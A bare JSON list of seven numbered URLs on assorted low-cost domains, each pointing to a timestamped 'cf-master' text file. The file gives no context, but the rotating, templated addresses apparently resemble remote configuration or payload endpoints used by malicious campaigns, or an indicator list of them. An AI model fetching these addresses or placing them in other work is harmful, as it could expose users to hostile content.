{
  "1": "https://syd.strategicexecution.sbs/v4/qu/tlokbt/cf-master.1774236648.txt",
  "2": "https://sxd.merchantserviceshub.shop/v4/pk8/xukn3a/cf-master.1774236706.txt",
  "3": "https://sw5.aurorafieldagency.shop/v4/ck/hend6q/cf-master.1774200776.txt",
  "4": "https://sw5.littleshorecreativeworks.cfd/v4/pk8/w8bziw/cf-master.1774200960.txt",
  "5": "https://sw5.mountainpathdesignco.store/v4/xq/nq16zq/cf-master.1774201340.txt",
  "6": "https://sbi.novaquestbranding.cyou/v4/ck/8kfbjq/cf-master.1774201415.txt",
  "7": "https://sw5.mindspirecreative.sbs/v4/epu/uphkcr/cf-master.1774201965.txt"
}